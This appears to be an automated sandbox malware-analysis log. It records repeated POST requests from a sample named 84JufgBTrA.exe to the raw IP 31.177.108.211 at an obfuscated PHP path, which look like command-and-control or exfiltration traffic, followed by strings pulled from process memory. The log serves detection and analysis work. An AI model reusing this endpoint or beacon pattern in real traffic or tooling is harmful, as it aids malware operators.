                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2084Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2108Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2108Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2108Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2108Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2108Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2080Expect: 100-continueConnection: Keep-Alive
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.177.108.211
                      Source: unknownHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                      Source: svchost.exe, 0000002C.00000003.1956030705.0000025C8FE18000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.44.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                      Source: svchost.exe, 0000002C.00000003.1956030705.0000025C8FE18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                      Source: qmgr.db.44.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                      Source: qmgr.db.44.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                      Source: svchost.exe, 0000002C.00000003.1956030705.0000025C8FE18000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.44.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                      Source: svchost.exe, 0000002C.00000003.1956030705.0000025C8FE18000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.44.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                      Source: svchost.exe, 0000002C.00000003.1956030705.0000025C8FE4D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.44.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                      Source: qmgr.db.44.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                      Source: powershell.exe, 00000018.00000002.3296971130.00000153AE666000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3186021704.0000019390077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 0000001D.00000002.1910780303.0000019380228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000016.00000002.1928723824.000001DB59AD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1928598666.0000026E65E28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1928426762.000001539E81A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1928638377.000001968E5E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1910780303.0000019380228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: 84JufgBTrA.exe, 00000000.00000002.1801490254.000000000343C000.00000004.00000800.00020000.00000000.sdmp, 84JufgBTrA.exe, 00000000.00000002.1801490254.0000000003C10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1928723824.000001DB598B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1928598666.0000026E65C01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1928426762.000001539E5F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1928638377.000001968E3C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1910780303.0000019380001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000016.00000002.1928723824.000001DB59AD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1928598666.0000026E65E28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1928426762.000001539E81A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1928638377.000001968E5E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1910780303.0000019380228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: powershell.exe, 0000001D.00000002.1910780303.0000019380228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
